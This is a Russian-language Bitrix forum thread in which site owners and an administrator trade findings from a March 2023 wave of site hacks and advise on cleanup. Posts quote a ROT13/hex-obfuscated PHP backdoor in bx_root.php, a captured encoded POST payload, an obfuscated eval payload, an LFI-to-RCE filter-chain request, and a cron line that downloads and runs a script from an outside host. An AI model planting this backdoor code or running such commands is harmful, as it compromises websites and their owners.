Разработчикам

Взломаны сайты в честь дня конституции украины

RSS

Пользователь 2624465

Заглянувший

Сообщений: 6 Регистрация: 21.09.2020

#426

02.03.2023 10:52:40

Цитата

написал:
Вчера, повторно, поле 24 февраля сайт упал. Во всех разделах создались файлы .htaccess и был вставлен зловредный код в код index.php. После анализа логов было обнаружено что в папке admin были созданы бекдоры с рандомными именами. Создавались эти бекдоры POST запросом к главной странице сайта. Вчера вечером по вашему совету поставил логирования POST запросов к главной странице и это дало результаты. Вот такие запросы прилетают:

Код

  array  (  
  'BX_STAT'  =>  '303q66696p655s7075745s636s6r74656r747326313q6269747269782s61646q696r2s6561323033363065653039302r70687026323q3p3s3q3430393732332n32303o6966286q643528245s434s4s4o49455o645q293q3q22313730323866343837636232613834363037363436646133616433383738656322297o6563686s226s6o223o6576616p286261736536345s6465636s646528245s524551554553545o69645q29293o696628245s504s53545o227570225q3q3q22757022297o40636s707928245s46494p45535o2266696p65225q5o22746q705s6r616q65225q2p245s46494p45535o2266696p65225q5o226r616q65225q293o7q7q3s3r' , 
)

обнаружил код в файле \bitrix\modules\main\bx_root.php

Код

   <? 
  if  ( isset ( $_POST [ "BX_STAT" ]) &&  $_POST [ "BX_STAT" ] <>  "" )    parse_str(hex2bin(str_rot13( $_POST [ "BX_STAT" ])), $bx_stat )  or   die (str_rot13(bin2hex( $bx_stat [ 0 ]( $bx_stat [ 1 ], $bx_stat [ 2 ]))));
  ?>

Что интересно дата bx_root.php такая же как у всех файлов ядра. В других дистрибутивах этого кода не обнаружил и поэтому удалил его. Наблюдаю дальше.

P.S Битрикс 18.5.180.

у меня в этом файле вот что

Код

<?
/*
$fname1 = __FILE__;
$fname2 = $_SERVER["DOCUMENT_ROOT"];
if(strpos($fname1, $fname2)!==0)
{
   $fname1 = realpath(__FILE__);
   $fname2 = realpath($_SERVER["DOCUMENT_ROOT"]);
}

if(strpos($fname1, $fname2)===0)
{
   $fname3 = RTrim($_SERVER["DOCUMENT_ROOT"], " /\\");
   $bx_root = substr($fname1, strlen($fname3));
   $bx_root = substr($bx_root, 0, strlen($bx_root) - strlen("/modules/main/include.php"));
}
else
   $bx_root = "/bitrix";

$bx_root = str_replace("\\", "/", $bx_root);
*/
$bx_root = "/bitrix";
define("BX_ROOT", $bx_root);

if(isset($_SERVER["BX_PERSONAL_ROOT"]) && $_SERVER["BX_PERSONAL_ROOT"] <> "")
   define("BX_PERSONAL_ROOT", $_SERVER["BX_PERSONAL_ROOT"]);
else
   define("BX_PERSONAL_ROOT", BX_ROOT);

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));


if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));

if (isset($_POST["BX_STAT"]) && $_POST["BX_STAT"] <> "")
   parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2]))));
?>

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#427

02.03.2023 11:02:54

ну если интересно что тут происходит можно
загнать в $_POST["BX_STAT"] содержимое post запроса, разделить функции на поэтапный вызов и дебаггером посмотреть
заодно по стеку вызовов глянуть как он подключается

если не интересно грохаем файлик и следим дальше

ну и первое, что нужно было сделать - конечно обновить лицензию и ядро

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 2624465

Заглянувший

Сообщений: 6 Регистрация: 21.09.2020

#428

02.03.2023 11:07:29

Цитата

написал:
ну если интересно что тут происходит можно
загнать в $_POST["BX_STAT"] содержимое post запроса, разделить функции на поэтапный вызов и дебаггером посмотреть
заодно по стеку вызовов глянуть как он подключается

если не интересно грохаем файлик и следим дальше

ну и первое, что нужно было сделать - конечно обновить лицензию и ядро

Стоит решение хамелеон с 10 торгующими лендингами. Существует ли риск потерять все это после обновления?

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#429 02.03.2023 11:11:45 ну это к создателям решения, по идее обновление не должно что-то ухудшить сделайте полный бэкап и проверьте Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 1991131 Заглянувший Сообщений: 13 Баллов: 1 Регистрация: 16.05.2018	#430 02.03.2023 13:30:45 Сегодня еще один схожий пациент пришел на лечение) Старый сайт, движок не обновлялся

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#431

02.03.2023 13:32:38

Цитата
Иван Ю. написал: Сегодня еще один схожий пациент пришел на лечение) Старый сайт, движок не обновлялся

и ко мне тоже пациент пришел

Цитата
Обновления были установлены: 22.03.2022 10:25:47

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#432

02.03.2023 13:50:25

мдда, уж - непонятно как такое может из агента запуститься

Скрытый текст

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 1991131

Заглянувший

Сообщений: 13 Баллов: 1 Регистрация: 16.05.2018

#433

02.03.2023 13:59:42

Цитата

написал:
мдда, уж - непонятно как такое может из агента запуститься
Скрытый текст
$arAgent["NAME"];//_(9.)H'5t}>qo7ouj7<(>!)U}3/]6u8u}Q%' //>w7u5ST<"IA.xY:8eeval /*9!._IkZ)1 DcpyxJA\"F/C1ra/9+E/&^15>Z"yd3y)vk$p6FN*/(/*]~P@.iKSyR3+hRfkLK~GUv3ZgJ!6dmtClEc{/*/urldecode#Dcc5L6|8cI8+~/?Y(/*I$s6IW3YhccLGyx^v2BAJN@ZnzRYVa+*/strrev/*8/WKh@/MlVGf6?yY`E)" w}SRU5]V{]n+5:tVJCC"j+8+%rlK{n*/(/* GC5%z1bi=x%3OOVsQB~jM%]:PZ*|Ox|v<3|8D`"bY(u*/'b3%56%57%27%47%02%e6%27%57%47%56%27%02%02%02%02%02%02%02%02%a0%d7%02%02%02%02%a0%b3%92%27%42%82%c6%16%67%56%02%02%02%02%a0%56%37%c6%56%02%02%02%02%a0%d7%02%02%02%02%a0%b3%27%42%02%d3%02%47%c6%57%37%56%27%f5%c6%16%67%56%42%02%02%02%02%a0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%44%f4%94%25%54%05%f5%35%94%02%c2%03%63%02%d3%02%c4%14%65%25%54%45%e4%94%f5%45%e4%54%74%14%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%a0%b7%92%92%d5%22%87%87%87%56%27%f6%47%37%56%27%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%a0%b3%72%b3%92%82%16%47%16%44%47%96%d6%26%57%37%a3%a3%56%c6%26%16%45%16%47%16%44%27%56%47%e6%57%f6%34%c5%c5%37%36%96%47%97%c6%16%e6%14%c5%c5%e6%96%16%d4%c5%c5%87%96%27%47%96%24%c5%c5%72%02%d3%02%27%42%02%02%02%02%a0%b7%56%37%c6%56%02%02%02%02%a0%d7%02%02%02%02%a0%d7%02%02%02%02%a0%b3%47%96%87%56%02%02%02%02%a0%b7%92%56%42%02%e6%f6%96%47%07%56%36%87%54%82%02%86%36%47%16%36%02%02%02%02%a0%d7%02%02%02%02%a0%b3%92%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%56%46%f6%36%56%46%c6%27%57%82%56%46%f6%36%56%46%c6%27%57%82%c6%16%67%56%02%d3%02%56%42%02%02%02%02%a0%b7%97%27%47%02%02%02%02%a0%a0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%74%e4%94%e4%e4%55%25%02%c2%03%02%d3%02%45%e4%55%f4%34%f5%95%25%45%54%25%02%c2%c4%c4%55%e4%02%d3%02%b4%34%54%84%34%f5%54%45%14%44%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%a0%b7%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%a0%02%02%02%02%02%02%02%02%a0%'/*}+o|u>#TYS0cP_\NWyaT2'55io>_yv*/) #T/N82kY'xApsEIx`?}`2_DB3;dm) /*pqPWM{~IE(WOT)l=?x[>zBI# yCBI#B:usrCorl6zEeOOSmoMJ.*/)/*LlRo0|sR8iF+.7}{MxB4Iqg8a5bp^OJ+=|z*/;/*"3YH?h_>d.8'Cay+z\A]M!.x,Lu({qx}&SFE<'c!6|)Y^*/

Тоже самое, прям дофига htaccess, левый код в файлах, много лишних левых файлов, и левые процессы на хосте

9100 0.1 0.0 387136 38844 ? S Feb28 4:18 php -f /home/w/......s/public_html/httpd.conf

Пользователь 7255

Посетитель

Сообщений: 25 Баллов: 3 Регистрация: 15.11.2006

#434

02.03.2023 14:09:54

Столкнулся с такой же проблемой. При помощи virusdie.ru вычистил зараженные файлы. Однако постоянно добавляется паразитный код в начало index.php и перезаписывается htaccess с редиректом на index.php.

Посмотрел список агентов - ничего вроде бы подозрительного, но на всякий случай декативировал все агенты. При этом все равно index.php и htaccess модифицируются практически мгновенно.

Перенес все файлы из папки сайта во временную папку, оставив public_html пустой - тут же создались index.php и htaccess.

На кроне каких-либо задач нет, хостинг - обычный шареный хостинг в Таймвебе.

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#435 02.03.2023 14:27:18 Алексей Шибинский, значит процесс в памяти сидит Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7255

Посетитель

Сообщений: 25 Баллов: 3 Регистрация: 15.11.2006

#436

02.03.2023 14:42:16

Цитата
написал: Алексей Шибинский, значит процесс в памяти сидит

Да, спасибо! Написал уже хостеру, чтобы грохнули все подозрительное.

Пользователь 7255

Посетитель

Сообщений: 25 Баллов: 3 Регистрация: 15.11.2006

#437

02.03.2023 14:44:42

Вроде как выше по теме уже писали, но на всякий случай, вдруг кому пригодится, ответ хостера:

Цитата
/opt/php71/bin/php /home/c/ccXXXXXX/public_html/lock666.php Вижу паразитный процесс, который фигурирует у других клиентов с вредоносом на Битрикс. Остановил все процессы на аккаунте, больше не запускается.

Пользователь 108671

Постоянный посетитель

Сообщений: 139 Баллов: 23 Регистрация: 25.11.2011

#438

02.03.2023 14:45:04

Цитата
написал: Алексей Шибинский, значит процесс в памяти сидит

Типа надо почистить и перезагрузить сервер?

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#439

02.03.2023 15:09:44

Цитата

написал:
Ломают через уязвимость LFI2RCE via PHP Filters.

POST запрос выглядит так:"POST /products/index.php?ID=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|.........|convert.base64-decode/resource=php://temp HTTP/1.1" 200 15544 "-" "firefox"
Будет создан веб-шелл через который дальше будут лить все подряд

Есть эта строка с параметрами целиком?

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#440 02.03.2023 15:18:45 Коллеги, для контроля целостности используйте штатный механизм Контроль целостности файлов /bitrix/admin/security_file_verifier.php Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 4148622

Заглянувший

Сообщений: 3 Регистрация: 24.04.2020

#441

02.03.2023 15:49:08

Цитата
написал: Коллеги, для контроля целостности используйте штатный механизм Контроль целостности файлов /bitrix/admin/security_file_verifier.php

на \bitrix\modules\main\bx_root.php не сработал механизм

Пользователь 47602

Посетитель

Сообщений: 29 Баллов: 4 Регистрация: 24.08.2009

#442

02.03.2023 16:05:50

Цитата
написал: на \bitrix\modules\main\bx_root.php не сработал механизм

я так понял, до конца так и не определились, родной тот код в конце или вредоносный.

у меня еще в \bitrix\components\bitrix\player\mediaplayer\skins\five\display\index.php подозрительный код был, возможно с именно этой атакой не связано.

Товарищи, те кто успешно лечит, сориентируйте пожалуйста по ценам на эту услугу + обновление до актуальных версий битрикса. Свежий бекап есть, но возможно он тоже с закладками.

Евгений Жуков

Администратор

Сообщений: 9434 Баллов: 1828 Регистрация: 05.08.2005

Epic fail - сказать "это так просто" и не суметь сделать

#443

02.03.2023 16:14:24

Цитата
написал: родной тот код в конце или вредоносный.

Вредоносный

Не надо сверлить зубы через задний проход дрелью от Сваровски

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#444

02.03.2023 17:20:22

Цитата

Евгений Жуков написал:

Цитата
написал: родной тот код в конце или вредоносный.

Вредоносный

Какие люди в наш топик пожаловали

Евгений Жуков, welcome !

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#445

02.03.2023 17:35:45

к ознакомлению про /bitrix/modules/main/bx_root.php

Цитата
<? define("BX_ROOT", "/bitrix"); if(isset($_SERVER["BX_PERSONAL_ROOT"]) && $_SERVER["BX_PERSONAL_ROOT"] <> "") define("BX_PERSONAL_ROOT", $_SERVER["BX_PERSONAL_ROOT"]); else define("BX_PERSONAL_ROOT", BX_ROOT);

остальное лишнее!

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 2663075 Постоянный посетитель Сообщений: 93 Баллов: 17 Регистрация: 20.11.2018	#446 02.03.2023 17:46:06 Дополнение: Сегодня обнаружили что под типа нормальный код маскируется вирусняк. причем с кучей комментов код Оптимизация скорости работы сайта и Оптимизация для сео (техническая оптимизация)

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#447

02.03.2023 18:36:04

Цитата
Алексей написал: Дополнение: Сегодня обнаружили что под типа нормальный код маскируется вирусняк. причем с кучей комментов код

Код в студию ... (в спойлер плиз)
и файл, где собственно обнаружен

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Евгений Жуков

Администратор

Сообщений: 9434 Баллов: 1828 Регистрация: 05.08.2005

Epic fail - сказать "это так просто" и не суметь сделать

#448

02.03.2023 18:36:42

Цитата
написал: Какие люди в наш топик пожаловали

Изначально незримо присутствовали

Не надо сверлить зубы через задний проход дрелью от Сваровски

Пользователь 3657558

Заглянувший

Сообщений: 6 Регистрация: 24.10.2019

#449

02.03.2023 19:30:21

рекомендую всем поискать закладки по шаблону:

Код
"str_rot13"

например:

Код
grep -r str_rot13 *

это выдаст примерно такой результат:

Код

bitrix/managed_cache/MYSQL/user_option/2b/2b1669a4c0fbb6f71b056d5801fb9824.php:$ser_content = 'a:2:{s:7:"CONTENT";s:0:"";s:4:"VARS";a:1:{s:6:"query1";s:16:"greps
tr_rot13 *";}}';
bitrix/modules/main/bx_root.php:#       parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))
);                                                                                                                                                                           
bitrix/modules/main/bx_root.php:#       parse_str(hex2bin(str_rot13($_POST["BX_STAT"])),$bx_stat) or die(str_rot13(bin2hex($bx_stat[0]($bx_stat[1],$bx_stat[2])))
);                                                                                                                                                                           
bitrix/modules/main/include/prolog_after.php:   CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);
bitrix/modules/main/include/prolog_after.php:   CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);
bitrix/modules/main/include/prolog_after.php:   CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);
bitrix/modules/main/include/prolog_after.php:   CControllerClient::RunCommand(hex2bin(str_rot13($_POST[BX_CONTROLLER_CLIENT_X])), 0, 0);
bitrix/modules/main/classes/general/vuln_scanner.php:                           'str_rot13',
bitrix/modules/socialnetwork/lib/item/logindex.php:             return str_rot13($str);

bitrix/managed_cache/MYSQL/ --- это я средствами битрикс искал, это всё ок
bitrix/modules/main/classes/general/vuln_scanner.php --- там и должно быть
bitrix/modules/socialnetwork/lib/item/logindex.php --- вроде должен быть, но модуль не использую, закоментировал.

ну а остальное закладки!

Пользователь 3705366 Заглянувший Сообщений: 7 Регистрация: 12.11.2019	#450 02.03.2023 19:37:23 На cron (crontab -u bitrix -e) эти клоуны вешают выполнение команд: /15 * * * wget -q -O xxxd http://hello.hellodolly777.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home/bitrix/

Взломаны сайты в честь дня конституции украины

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером